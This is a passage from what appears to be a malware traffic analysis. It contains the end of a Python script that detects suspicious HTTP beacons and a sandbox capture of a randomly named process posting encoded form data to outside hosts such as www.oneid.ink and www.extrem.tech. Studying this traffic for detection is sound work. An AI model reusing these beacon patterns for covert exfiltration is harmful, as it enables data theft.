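            and headers.get("referer") == f"http://{host}{path}":
        hits.append("self-referencing-origin")
    return hits

def is_suspicious(raw: str) -> bool:
    return len(indicators(raw)) >= 2  # assumed threshold; one indicator alone is weak

def shared_field_names(raws) -> set:
    """Field names used both as GET query keys and as POST form keys in a capture."""
    get_keys, post_keys = set(), set()
    for req in map(parse_request, raws):
        (get_keys if req["method"] == "GET" else post_keys).update(fields(req))
    return get_keys & post_keys

def decode_data_raw(hex_dump: str) -> str:
    """Turn a 'Data Raw' hex listing back into its 'Data Ascii' text."""
    return binascii.unhexlify(hex_dump.replace(" ", "")).decode("latin-1")

def redirect_echoes_request(html: str, raw_request: str) -> bool:
    """True when the JS redirect in a response body carries the request's own query
    string unchanged, i.e. the server only bounced the beacon back."""
    m = REDIRECT_RE.search(html)
    return bool(m) and urlsplit(m.group(1)).query == urlsplit(parse_request(raw_request)["target"]).query

if __name__ == "__main__":
    for raw in CAPTURED:
        print(is_suspicious(raw), indicators(raw))
    print("shared keys:", shared_field_names(CAPTURED))
    print("session 36 redirect echoes the query:",
          redirect_echoes_request(decode_data_raw(SESSION36_DATA_RAW), CAPTURED[0]))
```

Run directly, the script lists the indicators per request. The threshold is deliberately above one: a benign login form posting a single alphanumeric field to /login/ trips the short-path check on its own, and a stale Chrome build string on its own is common in corporate environments; the combination, plus the same field name recurring across GET and POST to different hosts, is what separates these sessions from ordinary browsing.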


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 38 | 192.168.2.4 | 50046 | 172.217.18.19 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Nov 17, 2024 08:38:22.534073114 CET | 771 | OUT | POST /wlyv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.oneid.ink
                                                                                Origin: http://www.oneid.ink
                                                                                Referer: http://www.oneid.ink/wlyv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 46 73 35 6b 71 35 4b 45 4f 44 4a 50 4e 43 2b 61 47 70 2b 37 41 32 72 36 70 6a 75 38 53 76 2b 56 55 32 67 2b 42 6b 51 50 4f 68 6a 78 50 58 4b 33 45 4a 4e 51 63 36 4d 34 36 35 78 45 4c 6e 4c 47 5a 49 58 6e 4c 46 77 30 41 42 68 67 56 6f 2b 41 63 4c 37 33 4c 6a 70 38 72 51 74 32 62 6d 39 79 34 4b 37 33 41 33 48 44 39 73 54 31 45 7a 4e 7a 5a 69 39 6f 74 4e 77 68 65 38 45 38 50 62 6f 61 38 64 47 33 36 49 36 53 44 71 57 37 34 38 54 59 2b 58 75 5a 44 36 75 4b 79 63 30 51 6a 31 77 42 5a 44 78 6f 73 71 6f 50 45 4e 62 72 62 75 69 75 76 58 6f 52 50 54 59 52 4a 2f 46 59 39 57 58 62 49 4d 68 64 55 39 66 46 49 6d 45 47 39 6b 79 32 4a 55 59 38 79 76 4d 3d
                                                                                Data Ascii: Y8i=Fs5kq5KEODJPNC+aGp+7A2r6pju8Sv+VU2g+BkQPOhjxPXK3EJNQc6M465xELnLGZIXnLFw0ABhgVo+AcL73Ljp8rQt2bm9y4K73A3HD9sT1EzNzZi9otNwhe8E8Pboa8dG36I6SDqW748TY+XuZD6uKyc0Qj1wBZDxosqoPENbrbuiuvXoRPTYRJ/FY9WXbIMhdU9fFImEG9ky2JUY8yvM=
                                                                                 Nov 17, 2024 08:38:23.500629902 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:23 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:23 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: c77d8c98ad2add2d9dd5daaf40b0ee41
                                                                                Content-Type: text/html
                                                                                Content-Encoding: gzip
                                                                                Transfer-Encoding: chunked
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Data Raw: 62 65 65 0d 0a 1f 8b 08 00 00 00 00 00 02 ff ac 98 7f 6f e3 c6 11 86 bf 0a 4f 87 a0 67 e0 44 ed 0f 2e 97 94 2d a7 a8 d3 36 2d 2e 69 90 14 2d 92 20 08 68 69 25 31 27 91 02 49 59 76 2e f7 dd fb cc 52 76 7c 87 04 ed 1f 3d 9f 4d 0d b9 3b 33 3b f3 ce 3b 23 5e bd 58 b5 cb e1 e1 10 92 ed b0 df 5d 5f c9 df 64 57 35 9b c5 24 34 13 e4 50 ad ae af f6 61 a8 92 e5 b6 ea fa 30 2c 26 c7 61 3d 2d 26 b3 eb ab 5d dd bc 4d ba b0 5b 4c ea 65 db 4c 92 6d 17 d6 8b c9 ac 6d 42 bd 4a 0f cd 46 d6 c4 ad 4d b5 0f 8b c9 5d 1d 4e 87 b6 1b 26 09 ab 87 d0 a0 ea 54 af 86 ed 62 15 ee ea 65 98 46 e1 75 dd d4 43 5d ed a6 fd b2 da 85 85 fe 48 c7 b0 0d fb 30 5d b6 bb b6 7b a6 e6 a5 8a ff 3e 5a bb 0a fd b2 ab 0f 43 2d be 3d 99 fc 26 34 ab 64 8f 8f 0f c9 d0 26 df 74 75 f2 a6 6a de 56 c9 b1 af 9b 4d 72 d3 85 55 3d cc 92 cf c2 6d 3d 24 cb aa 5b 25 75 d3 0f 55 33 7c 78 e0 ea 70 d8 85 e9 d0 1e 97 db e9 ef 1f fe d7 00 ed ab a6 5e 87 9e b3 9f 83 f4 78 23 fd a9 c7 3d 02 35 d4 c3 2e 5c ff a3 09 5f 87 7d 3d 5c cd 46 f9 79 fc e2 9d 67 27 79 5c fb [TRUNCATED]
                                                                                Data Ascii: beeoOgD.-6-.i- hi%1'IYv.Rv|=M;3;;#^X]_dW5$4Pa0,&a=-&]M[LeLmmBJFM]N&TbeFuC]H0]{>ZC-=&4d&tujVMrU=m=$[%uU3|xp^x#=5.\_}=\Fyg'y\tCB7<,&f_WIN0]ewd;~>NtjtgOj_o?FmW,%lyunU=c}Uu OujO7~^G5&!\u|%b/35KN4WuZ-KHLgw,-\)w&cI.Q2mzjstmIJ!4.$ob$^6^O{(:Y0q".](v7ro94Bm7'@q7>9w}x>y7tUn?$J_wu;VsjunwZ\'AO&WUDErom.!5)ux}$'W>t'F{fU;.}<{>V<<\w]2y'.[m{Cz!jU/zh^>
                                                                                 Nov 17, 2024 08:38:23.500679016 CET | 1236 | IN | Data Raw: f7 d5 8d c4 9c 2c b5 cd a7 dc fd e7 96 a3 70 65 e3 0b 90 2c c1 59 4c ce d9 3b b4 d1 e1 cb 6d a8 37 db 61 9e 15 87 fb cb 48 ef f3 ea 38 b4 97 87 6a b5 82 6d e7 fe 70 9f 3c fb bd 7c 42 c3 ba be 0f ab 17 f5 5e da 05 dc 7b 19 09 7f fe 72 bd 5e 5f de
                                                                                Data Ascii: ,pe,YL;m7aH8jmp<|B^{r^_i?.jWuU._/9Xit%WfZa.&p?/=3~[-n3_8\gq+6+Z~e*tZ~ qv0FrQv^6!'64@
                                                                                 Nov 17, 2024 08:38:23.500718117 CET | 424 | IN | Data Raw: 43 39 82 39 92 4a 26 f0 11 59 49 53 c1 2b d1 46 15 c2 f5 c2 dc ec 8e 8f 01 48 ac 3a ab a5 c1 45 6f b0 96 93 54 00 24 eb 8a 92 f5 90 8a 16 ce 20 a6 9c 5d f4 40 be 98 43 ce 04 d5 98 f1 60 03 59 79 47 ec c9 45 0e 6a d9 9f c3 ee 92 d3 d1 1d e8 98 86
                                                                                Data Ascii: C99J&YIS+FH:EoT$ ]@C`YyGEj)q_~$)P,aA/<[&}V:\EN="b:9err#@G*}^I)EJ&b2tbBZ(::UIt:9.vn/~P9EV(~xZJ>z DL^DzL!l]y
                                                                                 Nov 17, 2024 08:38:23.501382113 CET | 491 | IN | Data Raw: 1e bc 51 17 70 d6 79 1d 01 11 5a a6 1e d0 43 4f 84 43 08 9d 0c 2f d8 a1 f8 99 46 e0 30 e2 c6 85 11 0e 75 94 1d 21 88 cd 2b 8e 0f a8 b3 52 4e 05 65 e8 20 07 e6 88 88 3f 8a 9d c1 33 0e 6a 99 90 05 bd 76 b4 4a a4 88 18 81 c9 4a 3a af 54 25 11 26 e4
                                                                                Data Ascii: QpyZCOC/F0u!+RNe ?3jvJJ:T%&qZLxg=:PggRB=D6"8`.$7{I8t(CeR<K"F_NzFD2'^i&Q29$hWBf,mDjFh2n<(u0RIbU=r
                                                                                 Nov 17, 2024 08:38:23.502506971 CET | 20 | IN | Data Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 39 | 192.168.2.4 | 50047 | 172.217.18.19 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Nov 17, 2024 08:38:25.085782051 CET | 10853 | OUT | POST /wlyv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.oneid.ink
                                                                                Origin: http://www.oneid.ink
                                                                                Referer: http://www.oneid.ink/wlyv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 46 73 35 6b 71 35 4b 45 4f 44 4a 50 4e 43 2b 61 47 70 2b 37 41 32 72 36 70 6a 75 38 53 76 2b 56 55 32 67 2b 42 6b 51 50 4f 68 72 78 50 6d 71 33 45 75 52 51 64 36 4d 34 6d 4a 78 46 4c 6e 4c 68 5a 4d 44 72 4c 46 38 6b 41 48 6c 67 61 71 32 41 64 2f 58 33 43 6a 70 38 30 41 74 37 46 57 39 6e 34 4b 72 7a 41 33 58 44 39 73 54 31 45 79 39 7a 51 54 39 6f 2b 64 77 75 4a 4d 45 37 59 72 6f 69 38 64 65 42 36 49 2f 6e 43 61 32 37 34 63 44 59 38 46 32 5a 49 36 75 4d 78 63 30 79 6a 31 39 62 5a 44 74 65 73 70 30 78 45 4b 7a 72 4e 4b 6e 52 38 45 59 64 65 41 74 44 4b 4d 39 75 37 6d 54 31 41 65 4a 62 56 34 2f 51 54 33 59 4b 6c 32 66 75 64 30 74 37 76 72 7a 59 31 71 32 30 54 36 66 68 74 72 30 66 31 77 51 68 6d 73 61 35 76 57 32 34 68 32 72 58 33 4a 71 35 31 41 77 2f 35 39 6e 42 4f 34 43 5a 57 35 34 33 5a 42 47 77 4b 71 6f 41 65 69 78 4f 76 41 59 31 38 74 58 78 64 59 4c 4f 48 46 64 55 6d 51 49 78 77 58 35 50 61 36 55 6e 71 59 33 56 79 36 65 7a 53 70 4b 41 46 68 66 48 38 66 52 71 70 34 6a 30 45 4a 38 37 32 4d [TRUNCATED]
                                                                                 Data Ascii: Y8i=Fs5kq5KEODJPNC+aGp+7A2r6pju8Sv+VU2g+BkQPOhrxPmq3EuRQd6M4mJxFLnLhZMDrLF8kAHlgaq2Ad/X3Cjp80At7FW9n4KrzA3XD9sT1Ey9zQT9o+dwuJME7Yroi8deB6I/nCa274cDY8F2ZI6uMxc0yj19bZDtesp0xEKzrNKnR8EYdeAtDKM9u7mT1AeJbV4/QT3YKl2fud0t7vrzY1q20T6fhtr0f1wQhmsa5vW24h2rX3Jq51Aw/59nBO4CZW543ZBGwKqoAeixOvAY18tXxdYLOHFdUmQIxwX5Pa6UnqY3Vy6ezSpKAFhfH8fRqp4j0EJ872M [TRUNCATED]
                                                                                 Nov 17, 2024 08:38:26.047517061 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:25 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:25 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: d821900188642a3441d611d65a140424
                                                                                Content-Type: text/html
                                                                                Content-Encoding: gzip
                                                                                Transfer-Encoding: chunked
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Data Raw: 62 65 65 0d 0a 1f 8b 08 00 00 00 00 00 02 ff ac 98 7f 6f e3 c6 11 86 bf 0a 4f 87 a0 67 e0 44 ed 0f 2e 97 94 2d a7 a8 d3 36 2d 2e 69 90 14 2d 92 20 08 68 69 25 31 27 91 02 49 59 76 2e f7 dd fb cc 52 76 7c 87 04 ed 1f 3d 9f 4d 0d b9 3b 33 3b f3 ce 3b 23 5e bd 58 b5 cb e1 e1 10 92 ed b0 df 5d 5f c9 df 64 57 35 9b c5 24 34 13 e4 50 ad ae af f6 61 a8 92 e5 b6 ea fa 30 2c 26 c7 61 3d 2d 26 b3 eb ab 5d dd bc 4d ba b0 5b 4c ea 65 db 4c 92 6d 17 d6 8b c9 ac 6d 42 bd 4a 0f cd 46 d6 c4 ad 4d b5 0f 8b c9 5d 1d 4e 87 b6 1b 26 09 ab 87 d0 a0 ea 54 af 86 ed 62 15 ee ea 65 98 46 e1 75 dd d4 43 5d ed a6 fd b2 da 85 85 fe 48 c7 b0 0d fb 30 5d b6 bb b6 7b a6 e6 a5 8a ff 3e 5a bb 0a fd b2 ab 0f 43 2d be 3d 99 fc 26 34 ab 64 8f 8f 0f c9 d0 26 df 74 75 f2 a6 6a de 56 c9 b1 af 9b 4d 72 d3 85 55 3d cc 92 cf c2 6d 3d 24 cb aa 5b 25 75 d3 0f 55 33 7c 78 e0 ea 70 d8 85 e9 d0 1e 97 db e9 ef 1f fe d7 00 ed ab a6 5e 87 9e b3 9f 83 f4 78 23 fd a9 c7 3d 02 35 d4 c3 2e 5c ff a3 09 5f 87 7d 3d 5c cd 46 f9 79 fc e2 9d 67 27 79 5c fb [TRUNCATED]
                                                                                Data Ascii: beeoOgD.-6-.i- hi%1'IYv.Rv|=M;3;;#^X]_dW5$4Pa0,&a=-&]M[LeLmmBJFM]N&TbeFuC]H0]{>ZC-=&4d&tujVMrU=m=$[%uU3|xp^x#=5.\_}=\Fyg'y\tCB7<,&f_WIN0]ewd;~>NtjtgOj_o?FmW,%lyunU=c}Uu OujO7~^G5&!\u|%b/35KN4WuZ-KHLgw,-\)w&cI.Q2mzjstmIJ!4.$ob$^6^O{(:Y0q".](v7ro94Bm7'@q7>9w}x>y7tUn?$J_wu;VsjunwZ\'AO&WUDErom.!5)ux}$'W>t'F{fU;.}<{>V<<\w]2y'.[m{Cz!jU/zh^>
                                                                                 Nov 17, 2024 08:38:26.047569036 CET | 1236 | IN | Data Raw: f7 d5 8d c4 9c 2c b5 cd a7 dc fd e7 96 a3 70 65 e3 0b 90 2c c1 59 4c ce d9 3b b4 d1 e1 cb 6d a8 37 db 61 9e 15 87 fb cb 48 ef f3 ea 38 b4 97 87 6a b5 82 6d e7 fe 70 9f 3c fb bd 7c 42 c3 ba be 0f ab 17 f5 5e da 05 dc 7b 19 09 7f fe 72 bd 5e 5f de
                                                                                Data Ascii: ,pe,YL;m7aH8jmp<|B^{r^_i?.jWuU._/9Xit%WfZa.&p?/=3~[-n3_8\gq+6+Z~e*tZ~ qv0FrQv^6!'64@
                                                                                 Nov 17, 2024 08:38:26.047609091 CET | 424 | IN | Data Raw: 43 39 82 39 92 4a 26 f0 11 59 49 53 c1 2b d1 46 15 c2 f5 c2 dc ec 8e 8f 01 48 ac 3a ab a5 c1 45 6f b0 96 93 54 00 24 eb 8a 92 f5 90 8a 16 ce 20 a6 9c 5d f4 40 be 98 43 ce 04 d5 98 f1 60 03 59 79 47 ec c9 45 0e 6a d9 9f c3 ee 92 d3 d1 1d e8 98 86
                                                                                Data Ascii: C99J&YIS+FH:EoT$ ]@C`YyGEj)q_~$)P,aA/<[&}V:\EN="b:9err#@G*}^I)EJ&b2tbBZ(::UIt:9.vn/~P9EV(~xZJ>z DL^DzL!l]y
                                                                                 Nov 17, 2024 08:38:26.047707081 CET | 491 | IN | Data Raw: 1e bc 51 17 70 d6 79 1d 01 11 5a a6 1e d0 43 4f 84 43 08 9d 0c 2f d8 a1 f8 99 46 e0 30 e2 c6 85 11 0e 75 94 1d 21 88 cd 2b 8e 0f a8 b3 52 4e 05 65 e8 20 07 e6 88 88 3f 8a 9d c1 33 0e 6a 99 90 05 bd 76 b4 4a a4 88 18 81 c9 4a 3a af 54 25 11 26 e4
                                                                                Data Ascii: QpyZCOC/F0u!+RNe ?3jvJJ:T%&qZLxg=:PggRB=D6"8`.$7{I8t(CeR<K"F_NzFD2'^i&Q29$hWBf,mDjFh2n<(u0RIbU=r
                                                                                 Nov 17, 2024 08:38:26.049510002 CET | 20 | IN | Data Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 40 | 192.168.2.4 | 50048 | 172.217.18.19 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Nov 17, 2024 08:38:27.633822918 CET | 498 | OUT | GET /wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.oneid.ink
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                 Nov 17, 2024 08:38:28.976594925 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:28 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:28 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: 1b78963158299ca5eca693e2726a2312
                                                                                Content-Type: text/html
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                Data Raw: 63 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 6f 6e 65 69 64 2e 70 6e 67 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 6e 64 20 6d 6f 6e 65 79 20 74 6f 20 53 72 69 20 4c 61 6e 6b 61 20 75 73 69 6e 67 20 43 72 65 64 69 74 2f 20 44 65 62 69 74 20 63 61 72 64 20 69 6e 73 74 61 6e 74 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 [TRUNCATED]
                                                                                Data Ascii: c93<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/oneid.png"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Send money to Sri Lanka using Credit/ Debit card instant"/><link rel="apple-touch-icon" href="/oneid.png"/><link rel="manifest" href="/manifest.json"/><title>OneRemit</title><meta name="title" content="OneRemit"/><meta property="og:title" content="OneRemit"/><meta name="twitter:title" content="OneRemit"/><meta name="description" content="Send money to Sri Lanka using Credit/ Debit card instant"/><script async src="https://www.googletagmanager.com/gtag/js?id=G-NF7P1YH6NR"></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-NF7P1YH6NR")</script><script defer="defer" src="/static/js/main.eeef10c9.js">
                                                                                 Nov 17, 2024 08:38:28.976656914 CET | 1236 | IN | Data Raw: 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2f 63 73 73 2f 6d 61 69 6e 2e 62 63 35 62 38 35 65 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e
                                                                                Data Ascii: </script><link href="/static/css/main.bc5b85e1.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><div class="wabtn" id="wabutton"><style>[wa-tooltip]{position:relative;cu
                                                                                Nov 17, 2024 08:38:28.976722956 CET | 1236 | IN | Data Raw: 20 30 2e 30 33 32 30 34 36 33 43 31 31 2e 36 31 33 20 2d 30 2e 31 38 39 34 35 35 20 38 2e 32 38 37 37 34 20 30 2e 38 31 37 34 38 33 20 35 2e 36 31 35 36 35 20 32 2e 38 36 35 33 35 43 32 2e 39 34 33 35 37 20 34 2e 39 31 33 32 33 20 31 2e 31 30 36
                                                                                Data Ascii: 0.0320463C11.613 -0.189455 8.28774 0.817483 5.61565 2.86535C2.94357 4.91323 1.10682 7.86244 0.447451 11.1638C-0.21192 14.4652 0.351026 17.8937 2.03146 20.8109L0.0625 28.0004L7.42006 26.0712C9.45505 27.1794 11.7353 27.7601 14.0524 27.7602H14.0
                                                                                Nov 17, 2024 08:38:28.976756096 CET | 1236 | IN | Data Raw: 33 20 37 2e 38 31 32 32 37 43 37 2e 38 39 39 20 38 2e 31 37 39 32 39 20 37 2e 35 39 32 30 39 20 38 2e 36 32 33 30 35 20 37 2e 33 38 35 34 37 20 39 2e 31 31 35 32 36 43 37 2e 31 37 38 38 34 20 39 2e 36 30 37 34 37 20 37 2e 30 37 37 30 34 20 31 30
                                                                                Data Ascii: 3 7.81227C7.899 8.17929 7.59209 8.62305 7.38547 9.11526C7.17884 9.60747 7.07704 10.1373 7.08655 10.6711C7.08655 12.3578 8.31519 13.9877 8.48655 14.2164C8.65791 14.4452 10.8581 18.0169 14.3425 19.3908C17.2382 20.5327 17.8276 20.3056 18.4562 20.
                                                                                Nov 17, 2024 08:38:28.976794004 CET | 848 | IN | Data Raw: 32 35 2e 37 37 33 37 43 39 2e 35 30 37 32 37 20 32 36 2e 38 36 39 32 20 31 31 2e 37 36 31 33 20 32 37 2e 34 34 33 32 20 31 34 2e 30 35 31 39 20 32 37 2e 34 34 33 34 48 31 34 2e 30 35 37 37 43 31 36 2e 37 37 31 31 20 32 37 2e 34 34 33 36 20 31 39
                                                                                Data Ascii: 25.7737C9.50727 26.8692 11.7613 27.4432 14.0519 27.4434H14.0577C16.7711 27.4436 19.4235 26.6392 21.6798 25.1321C23.936 23.6249 25.6947 21.4825 26.7335 18.9759C27.7722 16.4693 28.0444 13.711 27.5157 11.0497C26.9869 8.38835 25.6809 5.94358 23.76
                                                                                Nov 17, 2024 08:38:28.976823092 CET | 160 | IN | Data Raw: 64 74 68 3d 22 32 37 2e 38 37 34 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 30 36 32 35 29 22 3e 3c 2f 72 65 63 74 3e 3c 2f 63 6c 69 70
                                                                                Data Ascii: dth="27.8748" height="28" fill="white" transform="translate(0.0625)"></rect></clipPath></defs></svg> <span class="button-text"></span></a></div></body></html>
                                                                                Nov 17, 2024 08:38:28.978673935 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                41 | 192.168.2.4 | 50049 | 13.248.169.48 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:34.218767881 CET | 757 | OUT | POST /ikn1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.extrem.tech
                                                                                Origin: http://www.extrem.tech
                                                                                Referer: http://www.extrem.tech/ikn1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 49 55 77 4d 75 48 72 35 77 39 36 2b 36 45 56 58 30 2b 65 51 59 7a 6e 39 55 66 37 56 67 50 71 66 4b 70 6f 78 39 47 6d 63 64 70 59 32 35 47 70 32 69 75 38 62 69 79 38 68 68 4a 49 4e 44 33 70 75 4b 55 6e 63 70 2b 61 41 65 57 52 65 72 36 62 64 58 64 61 43 30 57 79 34 63 78 41 76 65 76 48 72 69 6e 65 37 4e 6d 4a 64 59 44 38 4a 5a 2b 65 31 4b 68 6b 62 45 4d 6e 6e 76 43 72 48 2f 4b 77 41 48 65 38 58 5a 71 58 58 68 35 67 63 78 56 4b 76 38 71 53 73 74 6c 34 31 57 6d 33 49 6b 70 64 35 65 66 36 47 2b 4e 77 56 37 31 67 68 53 70 77 59 37 33 6b 5a 44 68 59 4e 63 45 36 5a 6a 49 6d 6a 67 3d 3d
                                                                                Data Ascii: Y8i=oIUwMuHr5w96+6EVX0+eQYzn9Uf7VgPqfKpox9GmcdpY25Gp2iu8biy8hhJIND3puKUncp+aAeWRer6bdXdaC0Wy4cxAvevHrine7NmJdYD8JZ+e1KhkbEMnnvCrH/KwAHe8XZqXXh5gcxVKv8qSstl41Wm3Ikpd5ef6G+NwV71ghSpwY73kZDhYNcE6ZjImjg==


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                42 | 192.168.2.4 | 50050 | 13.248.169.48 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:36.805643082 CET | 777 | OUT | POST /ikn1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.extrem.tech
                                                                                Origin: http://www.extrem.tech
                                                                                Referer: http://www.extrem.tech/ikn1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
